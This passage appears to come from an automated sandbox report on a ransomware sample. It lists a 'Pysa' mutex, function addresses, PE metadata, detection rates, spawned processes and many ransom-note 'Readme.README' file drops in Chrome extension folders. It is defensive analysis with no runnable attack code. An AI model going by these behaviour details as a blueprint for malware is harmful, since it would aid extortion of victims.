                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeCode function: 0_2_014125AF0_2_014125AF
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeCode function: 0_2_013F85C40_2_013F85C4
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeCode function: 0_2_013D09300_2_013D0930
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeCode function: 0_2_013EE9400_2_013EE940
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeCode function: 0_2_013F69BA0_2_013F69BA
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeCode function: 0_2_013D0B540_2_013D0B54
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeCode function: 0_2_013F6DEF0_2_013F6DEF
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeCode function: 0_2_013EEF100_2_013EEF10
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeCode function: 0_2_013E8FB00_2_013E8FB0
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeCode function: 0_2_013D0FA00_2_013D0FA0
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeCode function: 0_2_0140B3090_2_0140B309
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeCode function: 0_2_013F72240_2_013F7224
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeCode function: 0_2_013EB2800_2_013EB280
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeCode function: 0_2_014014200_2_01401420
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeCode function: 0_2_013D54E00_2_013D54E0
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeCode function: 0_2_013CDA700_2_013CDA70
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeCode function: 0_2_013FFDAB0_2_013FFDAB
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeCode function: 0_2_013F1C5F0_2_013F1C5F
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeCode function: 0_2_013EFE100_2_013EFE10
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeCode function: 0_2_013F5E500_2_013F5E50
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeCode function: String function: 013F243E appears 36 times
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeCode function: String function: 013F47A8 appears 67 times
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeCode function: String function: 013F26C2 appears 81 times
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeCode function: String function: 013F3660 appears 51 times
                  Source: classification engineClassification label: mal80.rans.spyw.evad.winEXE@3/1025@0/0
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeMutant created: \Sessions\1\BaseNamedObjects\Pysa
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4952:120:WilError_01
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Readme.READMEJump to behavior
                  Source: 6hFKK8UQi7.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: 6hFKK8UQi7.exeVirustotal: Detection: 52%
                  Source: 6hFKK8UQi7.exeReversingLabs: Detection: 68%
                  Source: unknownProcess created: C:\Users\user\Desktop\6hFKK8UQi7.exe 'C:\Users\user\Desktop\6hFKK8UQi7.exe'
                  Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknownProcess created: C:\Windows\System32\OpenWith.exe C:\Windows\system32\OpenWith.exe -Embedding
                  Source: C:\Windows\System32\OpenWith.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
                  Source: 6hFKK8UQi7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: 6hFKK8UQi7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: 6hFKK8UQi7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: 6hFKK8UQi7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: 6hFKK8UQi7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: 6hFKK8UQi7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: 6hFKK8UQi7.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                  Source: 6hFKK8UQi7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: 6hFKK8UQi7.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: 6hFKK8UQi7.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: 6hFKK8UQi7.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: 6hFKK8UQi7.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: 6hFKK8UQi7.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeCode function: 0_2_013F269C push ecx; ret 0_2_013F26AF
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeCode function: 0_2_013F36A6 push ecx; ret 0_2_013F36B9
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\ar\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\bg\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\ca\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\cs\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\da\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\de\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\el\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\en_GB\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\en_US\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\es\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\et\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\fi\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\fil\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\fr\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\he\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\hi\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\hu\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\id\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\it\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\ja\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\ko\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\lt\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\lv\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\ms\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\nl\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\no\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\pl\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\pt_BR\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\pt_PT\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\ro\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\ru\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\sk\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\sl\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\sr\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\sv\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\th\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\tr\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\uk\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\vi\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\zh_CN\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\zh_TW\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_metadata\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\ar\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\bg\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\ca\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\cs\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\da\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\de\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\el\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\en_GB\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\en_US\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\es\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\et\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\fi\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\fil\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\fr\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\he\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\hi\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\hu\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\id\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\it\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\ja\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\ko\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\lt\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\lv\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\ms\Readme.READMEJump to behavior
